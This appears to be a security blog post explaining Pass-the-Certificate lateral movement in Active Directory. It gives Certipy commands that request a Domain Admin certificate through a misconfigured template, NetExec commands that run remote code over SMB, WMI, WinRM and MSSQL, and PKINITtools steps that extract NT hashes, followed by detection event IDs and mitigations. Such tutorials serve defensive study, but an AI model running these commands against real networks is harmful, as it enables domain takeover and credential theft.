Pass-the-Certificate: The Stealthy Kerberos PKINIT Lateral Movement That Bypasses Passwords and NTLM Hashes + Video

Listen to this Post

Featured Image

Introduction:

Pass-the-Certificate is an advanced post-exploitation technique that leverages X.509 certificates (.pfx) for authentication instead of traditional passwords or NTLM hashes within Active Directory environments. This sophisticated attack exploits the PKINIT (Public Key Cryptography for Initial Authentication) extension of the Kerberos protocol, allowing attackers to request Ticket-Granting Tickets (TGTs) using stolen or forged certificates. By obtaining a domain administrator’s certificate, an attacker can seamlessly move laterally across the network, accessing SMB, WMI, WinRM, and MSSQL services without ever supplying a password or NTLM hash—making detection extremely challenging.

Learning Objectives:

  • Master the Pass-the-Certificate attack chain, including PFX certificate acquisition via AD CS misconfigurations and direct tool-based lateral movement.
  • Execute lateral movement commands using NetExec (nxc) and Impacket across multiple protocols (SMB, WMI, WinRM, MSSQL) with certificate-based authentication.
  • Convert certificates to CCACHE Kerberos tickets and retrieve NT hashes via UnPAC-the-hash for further credential abuse.

You Should Know:

1. Core PKINIT Authentication Mechanics

Pass-the-Certificate fundamentally relies on PKINIT, Kerberos’s asymmetric pre-authentication method. Unlike symmetric pre-authentication using DES, RC4, AES keys, PKINIT uses a public/private key pair from an X.509 certificate. The attacker presents a valid certificate (with the private key) to the Key Distribution Center (KDC), which validates the signature and issues a TGT if the certificate maps to a valid domain account. Crucially, this bypasses password policies, smart card requirements, and traditional credential monitoring. The certificate itself must be accompanied by its private key, typically encapsulated in a PFX (PKCS12) file or as PEM certificate+key pairs. This technique is often used in conjunction with AD CS abuse (ESC1–ESC8), shadow credentials, and UnPAC-the-hash to fully compromise domain accounts.

Step‑by‑step guide: configuring Kerberos for PKINIT attacks

Before using Pass-the-Certificate tools, ensure your attacking machine’s Kerberos configuration is correct. Edit `/etc/krb5.conf` and set your domain’s realm and KDC:

[bash]
default_realm = IGNITE.LOCAL

[bash]
IGNITE.LOCAL = {
kdc = DC.ignite.local
admin_server = DC.ignite.local
}

[bash]
.ignite.local = IGNITE.LOCAL
ignite.local = IGNITE.LOCAL

Also add the Domain Controller’s IP to `/etc/hosts`:

192.168.1.11 DC.ignite.local dc.ignite.local

This ensures that tools like NetExec and Impacket can resolve the KDC correctly when performing PKINIT authentication.

  1. Acquiring a PFX Certificate: AD CS Exploitation (ESC1)

A stolen PFX certificate is the cornerstone of the attack. Attackers typically obtain one by exploiting misconfigured certificate templates in Active Directory Certificate Services (AD CS). The most common method is ESC1: a certificate template that allows low-privileged users to specify an alternative Subject Alternative Name (SAN), thereby requesting a certificate for any user, including a Domain Admin. Conditions for ESC1 include:
– The template permits enrollment by low-privileged users.
– The requester can supply a SAN.
– Client Authentication is present in the Extended Key Usage (EKU).
– No critical constraints limit the template.

Step‑by‑step guide: exploiting ESC1 with Certipy

  1. Enumerate vulnerable templates using Certipy (or its Windows equivalent, Certify):
certipy find -u 'lowpriv' -p 'Password123' -dc-ip 192.168.1.11 -vulnerable
  1. Request a certificate for the Domain Administrator (e.g., [email protected]):
certipy req -u 'lowpriv' -p 'Password123' -ca 'IGNITE-CA' -target 'DC.ignite.local' -template 'ESC1-Template' -upn '[email protected]'
  1. Convert the obtained certificate and private key into a PFX file (Certipy does this automatically, outputting a `.pfx` file).

  2. Optionally, remove the PFX password for easier tool usage:

certipy cert -export -pfx administrator.pfx -password 'original_password' -out unprotected.pfx

Now you have a usable PFX certificate for the target account. This certificate can be used to authenticate as that user directly.

  1. Lateral Movement Using NetExec (nxc) with PFX Certificates

NetExec (nxc), starting from version 1.4.0, natively supports Pass-the-Certificate across multiple protocols. This integrated approach eliminates the need for separate scripts, streamlining the attack. The tool uses the PFX certificate to authenticate to the KDC via PKINIT, obtains a TGT, and then uses that TGT to access remote services on target machines.

Step‑by‑step guide: executing commands over SMB, WMI, WinRM, and MSSQL

SMB Protocol (port 445): Executes commands via wmiexec (default) or smbexec.

nxc smb 192.168.1.11 --pfx-cert administrator.pfx -u administrator -x 'ipconfig'

WMI Protocol (port 135/RPC): Stealthier execution as it does not create a service on the target.

nxc wmi 192.168.1.11 --pfx-cert administrator.pfx -u administrator -x 'whoami'

WinRM Protocol (port 5985): Uses Windows Remote Management, blending with legitimate admin traffic.

nxc winrm 192.168.1.11 --pfx-cert administrator.pfx -u administrator -x 'systeminfo' --kdcHost 192.168.1.11

MSSQL Protocol (port 1433): Executes commands via xp_cmdshell on SQL servers.

nxc mssql 192.168.1.13 --pfx-cert administrator.pfx -u administrator -x 'systeminfo'

In all cases, successful authentication returns a “Pwn3d!” flag and the command output, confirming administrative access.

  1. Converting PFX to CCACHE and Extracting NT Hashes (UnPAC-the-hash)

While NetExec provides direct command execution, converting the certificate to a CCACHE ticket enables broader Kerberos-based attacks, including pass-the-cache and UnPAC-the-hash. UnPAC-the-hash retrieves the user’s NT hash from the PAC (Privilege Attribute Certificate) inside a Kerberos ticket obtained via PKINIT. This NT hash can then be used for pass-the-hash, silver tickets, or delegation abuse.

Step‑by‑step guide: using PKINITtools to obtain TGT and NT hash

  1. Request a TGT using `gettgtpkinit.py` (from PKINITtools) with the PFX certificate:
python gettgtpkinit.py -cert-pfx administrator.pfx -pfx-pass 'optional_password' ignite.local/Administrator admin_tgt.ccache

The tool prints an AS-REP encryption key, which is required later.

2. Export the TGT to the environment:

export KRB5CCNAME=admin_tgt.ccache
  1. Retrieve the NT hash using `getnthash.py` with the previously obtained AS-REP key:
python getnthash.py -key 'AS-REP_encryption_key_hex' ignite.local/Administrator

The output reveals the NT hash, which can be used for further attacks (e.g., pass-the-hash, silver tickets). This technique works because the KDC includes the user’s NTLM hash in the PAC when PKINIT is used, allowing a seamless fallback to NTLM for legacy services.

5. Detection and Mitigation Strategies

Detection Opportunities:

  • Event ID 4768: A Kerberos TGT was requested. Monitor for PKINIT pre-authentication (certificate-based) from unusual source IPs or non-Windows hosts. Look for certificates issued by a self-signed CA rather than the corporate CA.
  • Event ID 4769: A Kerberos service ticket was requested. Correlate with 4768 to detect pass-the-ticket chains.
  • Event ID 4672: Special privileges assigned to a new logon. Alerts when administrative tokens are issued after certificate-based logon.
  • Event ID 7045: A new service was installed. Detects PsExec-style service creation (often with randomly generated names).
  • Event ID 4688: Process creation. Monitor for `cmd.exe` or `powershell.exe` spawned by `wmiprvse.exe` (WMI) or `wsmprovhost.exe` (WinRM).
  • Event ID 4698: A scheduled task was created. Detects AtExec-style task scheduler abuse.

Defensive Recommendations:

  • Audit AD CS Templates: Regularly review certificate templates for dangerous configurations (ESC1–ESC16). Remove unnecessary enrollment permissions for low-privileged users.
  • Monitor Certificate Issuance: Enable audit logging on the Certificate Authority. Track all certificate requests and issuances, especially for privileged accounts.
  • Implement Tiered Administration: Restrict administrative accounts to specific tiers. Domain Admin certificates should only be usable from Privileged Access Workstations (PAWs).
  • Enable PKINIT Freshness Extension: On Windows Server 2016+, enable freshness tokens to make stolen certificates harder to replay.
  • Rotate Certificates: Implement short certificate lifetimes (e.g., 24 hours) with automated renewal processes.
  • Network Segmentation: Restrict WinRM (5985/5986), SMB (445), WMI/RPC (135), and MSSQL (1433) access to only authorized administrative workstations.
  • Deploy EDR: Modern EDR solutions can detect Impacket tool signatures, service creation patterns, and anomalous WMI/WinRM usage.

What Undercode Say:

  • Key Takeaway 1: Pass-the-Certificate represents a paradigm shift from credential-based to certificate-based lateral movement. It exploits the inherent trust in PKINIT, bypassing traditional password and hash defenses. Organizations heavily reliant on AD CS must prioritize certificate template auditing and implement strict enrollment controls, as misconfigurations can allow any domain user to escalate to Domain Admin.
  • Key Takeaway 2: The integration of Pass-the-Certificate into NetExec (nxc v1.4.0+) lowers the barrier for attackers, enabling seamless lateral movement across multiple protocols with a single command. Defenders must shift their monitoring to Kerberos PKINIT events (4768, 4769) and anomalous process creation patterns, as traditional NTLM-based detection fails against this technique. Combining certificate rotation, tiered administration, and network segmentation is essential to mitigate this threat.

Prediction: As Microsoft continues to phase out NTLM and encourage Kerberos with PKINIT, Pass-the-Certificate attacks will become increasingly prevalent. Attackers will increasingly target AD CS as a primary vector for initial compromise, leveraging ESC techniques to forge certificates for privileged accounts. Defenders will need to adopt zero-trust principles for certificate issuance, implement continuous monitoring of PKINIT authentication events, and deploy automated certificate lifecycle management to reduce the window of opportunity. The battle will shift from protecting passwords to securing the entire PKI infrastructure, making AD CS security a critical pillar of modern Active Directory defense.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Pass The – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky